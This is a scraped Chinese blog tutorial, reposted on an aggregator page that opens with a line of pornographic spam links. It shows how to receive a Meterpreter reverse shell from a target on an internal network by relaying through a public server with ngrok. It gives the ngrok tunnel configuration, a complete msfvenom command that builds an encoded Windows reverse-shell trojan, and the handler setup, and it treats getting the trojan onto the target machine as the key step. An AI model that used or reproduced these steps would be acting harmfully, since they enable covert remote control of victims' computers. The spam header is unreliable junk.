日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

通过ngrok在内网捕获meterpreter反弹

發布時間:2025/3/21 编程问答 35 豆豆
生活随笔 收集整理的這篇文章主要介紹了 通过ngrok在内网捕获meterpreter反弹 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

一、準備工作
在學習msf的過程中,一般都是搭建虛擬機,在局域網里進行練習的。在實際滲透中,目標機器與我們的主機可能并不在同一個網絡內,甚至會有雙方都處在內網中的情況。那么,如何讓處在內網中的目標機器把 meterpreter shell 反彈到同樣在內網中的主機呢?

首先需要一臺有公網ip的服務器,用作中轉。然后在服務器上部署ngrok服務,并生成linux平臺的客戶端程序。我選擇的是自己搭建ngrok服務器,版本是1.7,可以在https://github.com/inconshreveable/ngrok找到源碼。網上有很多部署ngrok的教程,我自己也做了一篇筆記https://blog.csdn.net/Kwansy/article/details/82186780,僅供參考。另外推薦使用2.x版本的ngrok,據說是更加穩定快速的版本(配置方面就得根據新版本來了,配置文件格式也是不一樣的。)

把編譯好的客戶端ngrok下載到Kali上,同目錄下創建配置文件,配置文件這樣寫

server_addr: "公網服務器的域名:4443" trust_host_root_certs: false tunnels:msf:proto:tcp: 8868remote_port: 8848

一定要注意,不能用tab鍵,全部用空格敲出來,并且縮進要嚴格按照規范來,多一個少一個空格都運行不起來。
配置文件自定義了一個隧道叫msf,這個可以自己改,意思就是在VPS上偵聽8848端口,然后轉發到本地8868端口。這里可以先運行一下,看看有沒有問題。在命令行中這樣寫

如果前面都沒有出錯,正常運行是這樣的

如果沒問題,就先退出掉ngrok,現在不需要運行它。

二、使用msfvenom生成木馬
這一步比較簡單,生成一個反彈木馬,也可以用shellcode自己編程,也可以在msf里面generate生成,這個看您心情。

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00\xff' lhost=公網服務器的IP lport=8848 -f exe > /root/a.exe

端口8848是木馬反彈到公網服務器的端口,我取這個是為了致敬8848鈦金手機。

下一步是把木馬發到目標機器上運行,這一步非常關鍵。

三、在MSF中接收反彈
具體的命令我就不貼了,總之是選擇exploit/multi/hander模塊,設置payload為windows...meterpreter...reverse_tcp
然后設置 lhost lport

set lport 127.0.0.1 set lport 8868 run

四、啟動ngrok

輸入第一步那條命令來啟動ngrok

./ngrok_for_linux -config=ngrok.cfg start msf

這樣木馬就連接到公網服務器的8848端口,然后通過ngrok轉發到本地的8868端口,被MSF接收到。

注意,一定要在MSF先run了再運行ngrok,順序不能錯。

總結

以上是生活随笔為你收集整理的通过ngrok在内网捕获meterpreter反弹的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。